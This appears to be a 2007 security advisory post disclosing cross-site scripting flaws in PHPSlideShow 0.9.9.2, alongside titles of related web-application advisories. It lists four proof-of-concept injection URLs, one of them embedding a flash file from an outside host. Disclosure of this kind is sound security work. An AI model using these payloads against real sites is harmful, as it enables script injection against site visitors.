Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Gekko <=0.8.2 (temp directory) Path Disclosure Liferay Enterprise Portal multiple XSS PHPkit 1.6.1 (include.php?path=) Remote File Inclusion Eurologon CMS Multiple SQL Injection From:morin.josh_(at)_gmail.com <morin.josh_(at)_gmail.com> Date:29.11.2007Subject:PHPSlideShow XSS UpdateVendor Site: http://www.zinkwazi.com/wp/scripts/ Version affected: 0.9.9.2 URL:http://www.example.com/scripts/demo/phpslideshow.php?directory=photos BID ref: 26576 By Jose Luis Gуngora Fernбndez PHPSlideShow is also susceptible the following inputs: 1.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory="><ifr ame> 2.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<html><f ont color="Red"><b>Pwned</b></font></html> 3.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf" 4.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION =%22search.php%22%20METHOD=%22GET%22%3E Discovered by: Joshua Morin
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Gekko <=0.8.2 (temp directory) Path Disclosure
Liferay Enterprise Portal multiple XSS
PHPkit 1.6.1 (include.php?path=) Remote File Inclusion
Eurologon CMS Multiple SQL Injection
